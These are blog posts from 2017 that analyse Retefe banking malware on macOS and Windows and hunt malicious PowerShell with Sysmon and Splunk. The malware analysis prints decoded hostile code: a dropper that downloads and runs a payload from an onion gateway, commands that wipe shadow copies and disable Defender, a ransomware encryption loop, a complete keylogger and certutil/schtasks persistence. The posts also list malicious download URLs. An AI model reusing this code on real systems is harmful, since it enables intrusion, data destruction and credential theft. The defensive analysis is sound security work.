Monday, May 29, 2017

Retefe hitting MacOSX - Some interesting points

A few weeks ago Check Point posted about OSX/Dok, a piece of macOS malware which is the version of Retefe ported to Mac OS.

Most of the technical aspects of this specimen's behaviour are described in the blog post referenced above; however, there are some other interesting points I would like to highlight.

In order to install some of the tools used by the malware, like Tor, the malware needs to fetch some packages from Homebrew, and this requires Xcode to be installed, hence both of them get installed.

It is possible to see the set of processes launched to install the different dependencies, and how some of the tools are installed from git.

Other than that, the proxy configuration that routes traffic through the Tor node can be easily spotted, as the malware modifies the file /Library/Preferences/SystemConfiguration/preferences.plist.

Regarding the persistence of the malware, and for the specific sample with hash 07b67d95176fb35e70c38561c8d67987, this is done by creating the file /Users/labtest/Library/LaunchAgents/homebrew.mxcl.tor.plist, which launches the Tor process once the user (in this case labtest) logs into the system.

Also, it is very easy to spot this process in the logs:

...
May 28 09:37:05 --- last message repeated 6 times ---
May 28 09:37:05 labtests-Mac com.apple.xpc.launchd[1] (homebrew.mxcl.tor): This service is defined to be constantly running and is inherently inefficient.
...

Lastly, the keychain file, where the certificate is stored, changes when the new certificate has been imported. This file lives in /Library/Keychains/
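As an added example (not the post's own code), the following Python script checks the two on-disk artefacts just described, a LaunchAgent plist and the proxy settings in preferences.plist, using the standard plistlib module; the plist fixtures are constructed, and the Proxies key layout under NetworkServices is assumed from the standard macOS format rather than taken from the post.

```python
"""Check macOS persistence and proxy artefacts of the kind left by OSX/Dok.

Added example, not from the original post. It parses constructed plist
fixtures with plistlib; the key layout of preferences.plist
(NetworkServices/<id>/Proxies) and the Homebrew-style LaunchAgent are
assumptions based on the standard macOS formats, not taken from the page.
"""
import plistlib

# Constructed fixture: what a Homebrew services LaunchAgent for Tor looks like.
LAUNCH_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>homebrew.mxcl.tor</string>
  <key>ProgramArguments</key>
  <array><string>/usr/local/opt/tor/bin/tor</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed fixture: a trimmed preferences.plist with one network service
# whose proxy settings have been changed to point at a local PAC/SOCKS proxy.
PREFERENCES = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>NetworkServices</key>
  <dict>
    <key>0A1B2C3D-EXAMPLE</key>
    <dict>
      <key>UserDefinedName</key><string>Wi-Fi</string>
      <key>Proxies</key>
      <dict>
        <key>ProxyAutoConfigEnable</key><integer>1</integer>
        <key>ProxyAutoConfigURLString</key><string>http://127.0.0.1:5555/proxy.pac</string>
        <key>SOCKSEnable</key><integer>1</integer>
        <key>SOCKSProxy</key><string>127.0.0.1</string>
        <key>SOCKSPort</key><integer>9050</integer>
      </dict>
    </dict>
  </dict>
</dict>
</plist>
"""

SUSPICIOUS_PROGRAMS = ("tor", "torsocks", "privoxy")
LOOPBACK = ("127.0.0.1", "localhost", "::1")


def launch_agent_findings(data: bytes) -> list:
    """Return findings for a LaunchAgent plist: a Tor-like binary kept alive."""
    plist = plistlib.loads(data)
    args = plist.get("ProgramArguments") or []
    program = (plist.get("Program") or (args[0] if args else "")).lower()
    findings = []
    if any(name in program.split("/")[-1] for name in SUSPICIOUS_PROGRAMS):
        findings.append(f"agent {plist.get('Label')} runs {program}")
        if plist.get("KeepAlive") or plist.get("RunAtLoad"):
            findings.append("agent is KeepAlive/RunAtLoad (restarts at login)")
    return findings


def proxy_findings(data: bytes) -> list:
    """Return findings for preferences.plist: proxies enabled toward loopback."""
    plist = plistlib.loads(data)
    findings = []
    for sid, svc in plist.get("NetworkServices", {}).items():
        name = svc.get("UserDefinedName", sid)
        proxies = svc.get("Proxies", {})
        if proxies.get("ProxyAutoConfigEnable"):
            findings.append(f"{name}: PAC enabled -> {proxies.get('ProxyAutoConfigURLString')}")
        for kind in ("HTTP", "HTTPS", "SOCKS"):
            host = proxies.get(f"{kind}Proxy", "")
            if proxies.get(f"{kind}Enable") and host in LOOPBACK:
                findings.append(f"{name}: {kind} proxy -> {host}:{proxies.get(f'{kind}Port')}")
    return findings


if __name__ == "__main__":
    for finding in launch_agent_findings(LAUNCH_AGENT) + proxy_findings(PREFERENCES):
        print("[!]", finding)
```

On a real host the same functions can be fed the bytes of each file under ~/Library/LaunchAgents and of /Library/Preferences/SystemConfiguration/preferences.plist.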

The first samples were detected on the 22/04, and the developer's signing certificate had the serial number "48 CA D4 E6 96 6E 22 D62". Some samples from those dates are:

Then on the 03/05 another bunch of emails were sent with this malware, but this time the certificate used to sign the malicious app had the serial number "12 72 51 B3 2B 9A 50 BD".
Some samples from those days:

On the 11/05 there was another bunch of emails and yet another certificate, "30 E1 5E 51 24 0E 65 13":

16/05, again another round of malicious emails and another certificate used, "57 CA 73 4E 7B 02 E2 28":

19/05, a new wave of emails and another certificate used, "5E 25 44 7D 4F 1A 7E 4D":

In all cases, the certificates used were created a day or a couple of days before being used to sign the malicious app, with valid Apple developer accounts.

Three days ago, a new wave of emails was sent, and again a new certificate was used, "61 BA 22 AC 99 02 79 A1". Again, the certificate was created the day before the first sample was detected.

It is very interesting to see the pattern across the email campaigns: the malicious app is signed with a different certificate each time.

This last sample, however, has a really low detection rate: only 4 AV engines detect it as malware.

Some samples are here:

In this last wave of emails there is something interesting worth mentioning. This time the malicious app is not attached to the email directly; instead, the attachment is a PDF file with a link to the malicious app hosted on Dropbox. Also, there are some typos in the email ("Amason" instead of "Amazon").

Another interesting point is that the PDF contains a link to the Windows version of the malware as well (a DOCX file with macros).

The PDF has been in VT since three days ago:
https://virustotal.com/en/file/eb0ee996575310d4ab029cd73e21b9d5205f0137269f1b687aa923dfde7eebe0/analysis/


The links to the linked malware are here:

hxxps://www.dropbox.com/s/moqk87enoib3o3o/Dokument_26.05.2017.docx?dl=1

hxxps://www.dropbox.com/s/2baxj6fvb2997v6/Dokument_26.05.2017.zip?dl=1


The Windows version of the malware has not changed since the last time I took a look here, when they were using PowerShell instead of JS.

Since the last time I looked at the Proxifier setup to figure out the banks affected, 49 new domains of Swiss banks have been included in the list:

*credinvest.ch *bancazarattini.ch *appkb.ch *arabbank.ch *apbank.ch *notenstein-laroche.ch *bankbiz.ch *bankleerau.ch *btv3banken.ch *bhibank.com *dcbank.ch *bnpparibas.com *bordier.com *banquethaler.com *bbva.ch *pbgate.net *cmcic-banquepasche.com *bil.com *bcpconnect.com *banquecramer.ch *banqueduleman.ch *bankhaus-jungholz.ch *sparhafen.ch *bankzimmerberg.ch *bankleerau.ch *vontobel.com *notenstein-laroche.ch *bankbiz.ch *ceanet.ch *ce-riviera.ch *cen.ch *cedc.ch *cbhbank.com *cimbanque.net *cembra.ch *cmvsa.ch *coutts.com *ca-financements.ch *commerzbank.com *dominickco.ch *efginternational.com *exane.com *ekaffoltern.ch *falconpb.com *gemeinschaftsbank.ch *frankfurter-bankgesellschaft.com *glarner-regionalbank.ch *globalance-bank.com *hsbcprivatebank.com

Friday, February 24, 2017

Hunting Retefe with Splunk - some interesting points

While I was creating some Splunk use cases to detect malware (together with Sysmon), I was doing some tests with the Retefe malware, which I have written about quite a bit in this blog. There are a couple of things I found interesting to share.

The initial infection vector is malspam with a fake bill in a DOCX file which contains some malicious code. However, this time the malicious code is PowerShell instead of JS (more info in http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html).

This can be spotted straight away in Splunk.

powershell -EncodedCommand "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"

The decoded command, which acts as a dropper, is the following:

$F=$env:Temp+'\RBXr1lk9P.js';
(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip='+(New-Object System.Net.WebClient).DownloadString('http://api.ipify.org/')+'&id='+((wmic path win32_logicaldisk get volumeserialnumber)[2]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F);

Basically, it requests a file located on a Tor hidden service (which is the payload) through the onion.to gateway: https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=

To request the file, it is necessary to send the victim's IP and the serial number of the logical disk as parameters. To do so, two things happen:

1) a request to http://api.ipify.org/ in order to get the victim's public IP
2) the command ((wmic path win32_logicaldisk get volumeserialnumber)[2]) is run to extract the serial number of the logical disk.

If the IP is not from certain countries, or the serial number is empty, the downloaded payload is empty as well, hence nothing happens. Actually, in some cases the index "2" doesn't work and needs to be different. For example, this command will work in some virtual machines (you just need to put a Swiss IP in place of w.x.y.z):


$F=$env:Temp+'\RBXr1lk9P.js';(New-Object System.Net.WebClient).DownloadFile('https://ele6idfdqwdr6m2w.onion.to/RBXr1lk9P.js?ip=w.x.y.z&id='+((wmic path win32_logicaldisk get volumeserialnumber)[4]).trim().toLower(),$F);(New-Object -com Shell.Application).ShellExecute($F)

Clearly, they are using the logical disk serial number for tracking purposes.

Once the script is pulled, the whole execution happens: some JS code is executed, some additional tools are decompressed and executed (Tor and Proxifier), the browser processes are killed, etc.

However, a couple of new 'features' have been introduced since my last posts:
http://blog.angelalonso.es/2016/10/malicious-email-campaign-against-swiss.html
http://blog.angelalonso.es/2016/10/malicious-email-campaign-mimicking.html

First of all, the way the Proxifier tool is launched has changed, as the window is now hidden. This is done with the PowerShell command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$t='[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';add-type -name w -member $t -namespace n;saps -FilePath \"Proxifier\";while(![n.w]::ShowWindow(([System.Diagnostics.Process]::GetProcessesByName(\"proxifier\")|gps).MainWindowHandle,0)){}"

Second, Proxifier is configured not to show its icon in the Windows system tray on the bottom left part of the desktop.

After that, the victim's traffic towards the banks is redirected to Tor. In order to steal the TAN SMS token, a malicious APK needs to be installed; however, there are some changes here as well:

Now the APK resides on a domain with a valid SSL certificate and can be downloaded over HTTPS. Before, this was not the case and the traffic was HTTP only.

Note that the certificate was registered a few days ago and its validity period is 2 months.

Moreover, if the victim is not a real victim, the APK download link does not serve the malicious APK but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected. Some examples of the URL for different banks:

https://mobile-sicherheitapp.com/ZKB-Security-v19-02.apk
https://mobile-sicherheitapp.com/CreditSuisse-Security_v1902.apk

https://mobile-sicherheitapp.com/Raiffeisenc-Security-v_19-02.apk

Monday, February 13, 2017

Hunting Mimikatz launched by PowerShell

Following my last post about how to hunt for malicious PowerShell commands, I'm interested in detecting Mimikatz once it is launched through PowerShell, for example with the PowerShell Empire framework. Mark Russinovich has just written that in order to detect Mimikatz you must monitor lsass.exe for process access.

So basically, I have created a simple filter in Sysmon for event ID 10 (ProcessAccess) with SourceImage powershell.exe and TargetImage lsass.exe:

<ProcessAccess onmatch="include">
  <SourceImage condition="contains">powershell.exe</SourceImage>
  <TargetImage condition="contains">lsass.exe</TargetImage>
</ProcessAccess>

Now it is time to test whether it works, so I use the Mimikatz module in PowerShell Empire.

In Splunk I detect the initial encoded PowerShell command.


After a few seconds I run an SPL query to see when the powershell.exe process accesses the lsass.exe process, which is when Mimikatz is executed :)
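As an added example (not the post's own code), here is the same include filter applied in Python over Sysmon events in the renderXml shape the forwarder ships; the events, computer name and GrantedAccess values are constructed, and the access-right bit it checks is an assumption drawn from the Windows process access rights rather than from the post.

```python
"""Sysmon event ID 10 (ProcessAccess) hunting: PowerShell touching lsass.exe.

Added example, not the post's own code. It reproduces the post's Sysmon
include filter (SourceImage contains powershell.exe, TargetImage contains
lsass.exe) over renderXml-style events. The events below are constructed;
the GrantedAccess values are chosen for the fixture, not observed.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def _event(eid, source, target, access, computer="WIN7-LAB"):
    # Build a minimal renderXml-shaped Sysmon event (constructed fixture).
    return (
        f"<Event xmlns='{NS['e']}'><System><Provider Name='Microsoft-Windows-Sysmon'/>"
        f"<EventID>{eid}</EventID><Computer>{computer}</Computer></System><EventData>"
        f"<Data Name='SourceImage'>{source}</Data><Data Name='TargetImage'>{target}</Data>"
        f"<Data Name='GrantedAccess'>{access}</Data></EventData></Event>"
    )


SAMPLE_EVENTS = [
    _event(10, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           r"C:\Windows\system32\lsass.exe", "0x1010"),
    _event(10, r"C:\Windows\system32\svchost.exe", r"C:\Windows\system32\lsass.exe", "0x1400"),
    _event(10, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           r"C:\Windows\explorer.exe", "0x1000"),
    _event(1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "", ""),
]

# Process access right that credential dumping needs (Windows PROCESS_VM_READ).
PROCESS_VM_READ = 0x0010


def parse_event(xml_text):
    """Return (event_id, {DataName: value}) for one Sysmon XML event."""
    root = ET.fromstring(xml_text)
    eid = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    data["Computer"] = root.findtext("e:System/e:Computer", default="", namespaces=NS)
    return eid, data


def hunt_lsass_access(events):
    """Apply the post's include filter and return details of the matching events."""
    hits = []
    for xml_text in events:
        eid, d = parse_event(xml_text)
        if eid != 10:
            continue
        if "powershell.exe" not in d["SourceImage"].lower():
            continue
        if "lsass.exe" not in d["TargetImage"].lower():
            continue
        access = int(d.get("GrantedAccess", "0"), 16)
        hits.append({
            "computer": d["Computer"],
            "source": d["SourceImage"],
            "granted_access": access,
            "reads_memory": bool(access & PROCESS_VM_READ),
        })
    return hits


if __name__ == "__main__":
    for hit in hunt_lsass_access(SAMPLE_EVENTS):
        print(hit)
```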

Friday, February 10, 2017

Hunting malicious behaviour abusing PowerShell with Sysmon and Splunk

Sysmon is a monitoring tool which, combined with Splunk, makes an excellent tandem for threat hunting. A good example was presented by Tom Ueltschi at Botconf 2016.

Windows PowerShell is a command shell very useful for administrative purposes, but at the same time it can be abused across the different phases of an intrusion, and it is being actively used by malware developers. For these reasons, I'm interested in hunting, using Sysmon and Splunk, for the cases where PowerShell is used for bad purposes. The setup is very simple: Windows machine(s) with the Splunk Forwarder and Sysmon. The two files that need to be configured are inputs.conf and config.xml.
A simple inputs.conf file for the forwarder is the following:

C:\Program Files\SplunkUniversalForwarder\etc\apps\SplunkUniversalForwarder\default\inputs.conf

#   Version 6.4.5
# these here just override and disable stuff that in system/default.

################################
# Data thru parsingQueue always
################################

[splunktcp]
route=has_key:tautology:parsingQueue;absent_key:tautology:parsingQueue

################################
# Make sure these get forwarded
################################

[monitor://$SPLUNK_HOME\var\log\splunk\splunkd.log]
_TCP_ROUTING = *
index = _internal

[monitor://$SPLUNK_HOME\var\log\splunk\metrics.log]
_TCP_ROUTING = *
index = _internal

[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = false
renderXml = true

Regarding the config.xml file for Sysmon, it is key to customise the file for each specific environment in order to reduce noise and catch all the interesting events. In my case, I have used a very simple one which works for my test environment and doesn't create much noise. A more advanced template is the one created by @SwiftOnSecurity.

<Sysmon schemaversion="3.2">
  <HashAlgorithms>MD5</HashAlgorithms>
 
  <EventFiltering>
    <!-- Log all drivers except if the signature -->
    <!-- contains Microsoft or Windows -->
    <DriverLoad onmatch="exclude">
      <Signature condition="contains">microsoft</Signature>
      <Signature condition="contains">windows</Signature>
    </DriverLoad>
    <NetworkConnect onmatch="include">
      <DestinationPort>443</DestinationPort>
      <DestinationPort>80</DestinationPort>
    </NetworkConnect>
  
    <!-- Exclude certain processes that cause high event volumes -->
    <ProcessCreate onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </ProcessCreate>
    <ProcessTerminate onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </ProcessTerminate>
    <FileCreateTime onmatch="exclude">
      <Image condition="contains">splunk</Image>
      <Image condition="contains">streamfwd</Image>
      <Image condition="contains">splunkd</Image>
      <Image condition="contains">splunkD</Image>
      <Image condition="contains">splunk</Image>
      <Image condition="contains">splunk-optimize</Image>
      <Image condition="contains">splunk-MonitorNoHandle</Image>
      <Image condition="contains">splunk-admon</Image>
      <Image condition="contains">splunk-netmon</Image>
      <Image condition="contains">splunk-regmon</Image>
      <Image condition="contains">splunk-winprintmon</Image>
      <Image condition="contains">btool</Image>
      <Image condition="contains">PYTHON</Image>
    </FileCreateTime>
  </EventFiltering>
</Sysmon>


As I said, I'm interested in any PowerShell command spawned and the parent process associated with it. With a simple SPL query I get all the executed PowerShell commands straight away, as shown below.

Let's analyse each of the PowerShell commands executed in the screenshot above:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c SafetyTest.rar
This command uses the 'ExecutionPolicy bypass' option. According to some documentation, the PowerShell execution policy was not designed as a security control, but as a control to limit mistakes made by sysadmins: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
In any case, any PowerShell command using that option should be considered suspicious.

It also runs with the "windowstyle hidden" option to hide the prompt. Although this is not a bad indicator per se, and some legitimate scripts run in the background with this option, this indicator together with any other additional indicator should raise an alert.

In the command above there is another suspicious thing: the 'rar' extension of the file executed by PowerShell. Looking at any process launched by that command (using it as ParentCommandLine), I get the following:

So basically, I see that the PowerShell command invokes cmd.exe to execute the 'rar' file, which means it is not a compressed 'rar' file. Following the flow, I see that SafetyTest.rar invokes another command: "C:\Users\angel\AppData\Local\Temp\Trojan.exe"


netsh firewall add allowedprogram "C:\Users\angel\AppData\Local\Temp\Trojan.exe" "Trojan.exe" ENABLE

Trojan.exe creates a firewall rule to allow itself through the firewall, a very, very suspicious activity; further investigation should be done on that system.

Continuing with the other PowerShell commands, I see there are several base64-encoded PowerShell commands. I consider any encoded command suspicious and in need of investigation, given that the embedded encoded command can be anything.


powershell -win hidden -enc

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

The command, when decoded, contains the following set of commands:

while($true){
wevtutil el | Foreach-Object {wevtutil cl "$_"}
REG add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
net stop VSS; REG add "HKLM\SYSTEM\CurrentControlSet\services\VSS" /v Start /t REG_DWORD /d 4 /f; vssadmin delete shadows /for=c: /all /quiet; vssadmin delete shadows /for=d: /all /quiet; vssadmin delete shadows /for=e: /all /quiet; vssadmin delete shadows /for=f: /all /quiet; vssadmin delete shadows /for=g: /all /quiet; vssadmin delete shadows /for=x: /all /quiet; vssadmin delete shadows /for=y: /all /quiet; vssadmin delete shadows /for=z: /all /quiet
netsh advfirewall set allprofiles state off
sc config wscsvc start= disabled
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
net stop WinDefend; sc config WinDefend= disabled; REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f; REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f; sc delete windefend
REG add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f; REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableSmartScreen /t REG_DWORD /d 0 /f
net stop wuauserv
Net user $env:USERNAME /active:no
#YCkill -processname lsass -Force; kill -processname smss -Force; kill -processname conhost -Force; kill -processname dwm -Force; kill -processname svchost -Force; kill -processname explorer -Force
kill -processname steam -Force; Remove-Item (${env:ProgramFiles(x86)} + "\Steam") -Recurse -Force
kill -processname skype -Force; Remove-Item ($env:APPDATA + "\Skype") -Recurse -Force
kill -processname ts3client_win64 -Force; Remove-Item ($env:APPDATA + "\TS3Client") -Recurse -Force
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
Remove-Item ([environment]::getfolderpath("Desktop") + "\*.*") -Recurse -Force; Remove-Item "C:\Users\Public\Desktop\*.*" -Recurse -Force
REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
#ZAkill -processname IExplore -Force; kill -processname MicrosoftEdge -Force
kill -processname Steam -Force
kill -processname Skype -Force
#ZDkill -processname Chrome -Force
kill -processname Firefox -Force
kill -processname ts3client_win64 -Force
kill -processname Origin -Force
kill -processname Word -Force
kill -processname Excel -Force
kill -processname Powerpoint -Force
kill -processname Pidgin -Force
kill -processname Opera -Force
kill -processname CyberGhost -Force
kill -processname iTunes -Force; kill -processname iTunesHelper -Force; kill -processname iPodService -Force
kill -processname vlc -Force
Lots of things going on here: modification of registry keys, stopping services, deleting shadow copies, disabling the firewall, disabling the Security Center service, stopping and disabling the antivirus (Bit defender), killing several processes, etc.

powershell -win hidden -enc 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...
The second encoded command uses the same encoding and hidden options, and contains the following PowerShell instructions:

$pass=('IwBHAG8ANwBSADcAcABlAGQAQgB5AHcAYQB6AGkAeAAjAA==')
$drives = 65..90 | foreach {[char]$_}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.jpeg")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.docx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.doc")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xlsx")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.xls")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.ppt")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.pdf")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp4")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mp3")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mov")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
foreach ($drv in $drives) {foreach($item in (Get-Childitem ($drv + ":\") -recurse -filter "*.mkv")){C:\ProgramData\helper.exe -e $pass $item.FullName ($item.FullName + ".crypt"); Remove-Item $item.FullName}}
This set of commands encrypts several sets of files and removes the original files.

powershell -win hidden -enc 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
Which, once decoded, is:
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot
function DynAmite-Key {$dateandtime = Get-Date -Format yyyy-MM-dd-HH-mm; $time = Get-Date -Format HH-mm
Add-Type @"
using System; using System.Runtime.InteropServices; public class UserWindows {[DllImport("user32.dll")]
    public static extern IntPtr GetForegroundWindow();}
"@
    $logfile = $loot + "keylog_" + "$dateandtime"+ ".log"
    $MAPVK_VK_TO_VSC = 0x00
 $MAPVK_VSC_TO_VK = 0x01
 $MAPVK_VK_TO_CHAR = 0x02
 $MAPVK_VSC_TO_VK_EX = 0x03
 $MAPVK_VK_TO_VSC_EX = 0x04
 $virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
 $kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
 $mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
 $tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
 $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
 $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
 $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
 $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
 while ($true) {Start-Sleep -Milliseconds 40
$TopWindow = [UserWindows]::GetForegroundWindow(); $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
$loot = ($env:LOCALAPPDATA + "\dyna\loot\Keylog\"); md $loot
$gotit = ""
  for ($char = 1; $char -le 254; $char++) {$vkey = $char
   $gotit = $getKeyState::GetAsyncKeyState($vkey)
  if ($gotit -eq -32767) {$l_shift = $getKeyState::GetAsyncKeyState(160)
    $r_shift = $getKeyState::GetAsyncKeyState(161)
    $caps_lock = [console]::CapsLock
    $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
    $kbstate = New-Object Byte[] 256
    $checkkbstate = $getKBState::GetKeyboardState($kbstate)
    $mychar = New-Object -TypeName "System.Text.StringBuilder";
    $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
    if ($unicode_res -gt 0) {Out-File -FilePath $logfile -Encoding Unicode -Append -InputObject ($time + " " + $WindowTitle), $mychar.ToString()    }   }  }}}

DynAmite-Key
This is a keylogger implemented in PowerShell. Very interesting usage of PowerShell :-)

powershell -win hidden -enc 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

The following command uses 'certutil' to create binary files which are later executed, as shown below:
$loot = ($env:LOCALAPPDATA + "\dyna\"); md $loot
certutil -decode res.crt ($loot + "res"); certutil -decode kl.crt ($loot + "kl.exe"); certutil -decode st.crt ($loot + "st.exe");  certutil -decode cry.crt ($loot + "cry.exe"); certutil -decode t1.crt ($env:TEMP + "\t1.xml"); certutil -decode t2.crt ($env:TEMP + "\t2.xml"); certutil -decode t3.crt ($env:TEMP + "\t3.xml"); certutil -decode t4.crt ($env:TEMP + "\t4.xml"); certutil -decode t5.crt ($env:TEMP + "\t5.xml"); certutil -decode bd.crt C:\ProgramData\bd.exe
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\1" /XML ($env:TEMP + "\t1.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\2" /XML ($env:TEMP + "\t2.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\3" /XML ($env:TEMP + "\t3.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\4" /XML ($env:TEMP + "\t4.xml")
schtasks.exe /create /TN "Microsoft\Windows\Windows Printer Manager\5" /XML ($env:TEMP + "\t5.xml")
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\1"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\2"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\3"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\4"
schtasks.exe /run /TN "Microsoft\Windows\Windows Printer Manager\5"
Remove-Item ..

"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwBhADMAZgA1ADcAM.....CQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=

The next one in the list is quite interesting as well. It uses some of the functions in the .NET framework to load additional code.
